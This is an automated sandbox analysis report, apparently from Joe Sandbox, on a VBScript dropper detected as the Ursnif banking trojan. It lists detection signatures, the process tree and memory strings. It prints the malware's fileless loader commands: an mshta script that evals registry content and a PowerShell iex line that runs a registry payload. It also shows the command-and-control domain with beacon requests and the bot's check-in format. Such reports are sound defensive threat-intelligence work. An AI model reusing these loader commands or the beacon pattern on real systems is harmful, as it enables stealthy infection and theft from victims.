Analysis Report my_presentation_96642.vbs

Overview

General Information

Sample Name: my_presentation_96642.vbs
Analysis ID: 286676
MD5: 2e44ef40fba0da489e9c15ff7c64692c
SHA1: 2b28439329860c37a6f73e9560c717e4f3962a4f
SHA256: bfd79682733c250d046f4174c4b5eb8df75f1132d7e6ac2aa0b5c4ad95419ab6

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6884 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6052 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1220 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6596 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5408 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6868 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5940 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6804 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4108 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6584 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • control.exe (PID: 3596 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', ProcessId: 6804
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5940
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', ProcessId: 6804

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: api10.laptok.at, Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: my_presentation_96642.vbs, Virustotal: Detection: 14%
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local

Networking:

Found Tor onion address
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: Joe Sandbox View, ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic, HTTP traffic detected:
    GET /api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1LY6s1oCH/O6I0fMOtxB_2FaMK/P_2FmFM_2F8ypR7/dx9hXoLcsTTkQCtqPt/jQT_2FP3D/Vu_2Br5n_2F72Y040sm_/2BshdGM4o4B1uUiNO_2/F9Br33BkXML4fx8yq9Jct6/kljeBXeVRXyBC/jH9YPFqS/oW_2BnptlSOO3fjce7eFLQs/cjY_2B3b6K/0jP5qluzKD5UfBlPH/Yyy63TkrNQlk/H6h_0A_0DaA/_2FxxiWhza0HQw/PJfj9KaKc_2Fqn7RK3nQF/t9F36pLVv5/WExF HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5Ci1Fp/NLUjkZDJX0Lhz0/_2B3Sl0fwWX3wVqK9fb0z/7prGaa1jNih_2FOl/e3_2BA_2FKyguNE/6gpQxTR29SWNVBzUiX/ooUjtYHSM/WJ2P7LXY0oqriYCDuUO5/6JGdRDFUFc7agHutM4Y/a7EEiaV_2B0Drpu7We2Elq/RNdw4UnphUm43/8yKUJrxx/MzdqD4aHhzJD6hXinP_2B_2/F_0A_0D_2F/yCrsh4eR2L6X7FBWv/KfYirZe4p8lP/b6dEfEFP0Hl/t0eFrlqKA0UbT2/NIFmqja4/0WX_2BS HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EFIKznixG/GIj81mj5k3B7TX2D/fTUrCzDV3sDdRNL/bMPSf9FVeacVj6Vh6g/21pfsCJp2/EOpd_2B8C24lKh5Q2hDj/jl4XV9jmwt81YjEedHm/Tvg4EvsmItvP2bpxHHYerN/GLMMgTJoYNBZD/lWpad5rU/ln_2FWDRI9hu_2B3EPbvwjD/xVOTspfDX3/s2TnvfY8e1XD_0A_0/D9Osa1XJDU3_/2BhSFJPYg7H/ypXm94knvghV5F/1R2_2FzWrhbikgq4I9drg/0B61m_2Bo/Km_2FnHXX/v HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml1.19.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.19.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.19.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.19.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.19.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.19.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown, DNS traffic detected: queries for: api10.laptok.at
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 16 Sep 2020 21:30:41 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmp, String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp, String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp, String found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6x
Source: {4B9FB8EA-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFED50CD2992DAC186.TMP.19.dr, String found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EF
Source: {4B9FB8E8-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFEC43E79FA2AE0F5E.TMP.19.dr, String found in binary or memory: http://api10.laptok.at/api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5
Source: {4B9FB8E6-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFFF962DDB9C468E8F.TMP.19.dr, String found in binary or memory: http://api10.laptok.at/api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1L
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txt
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
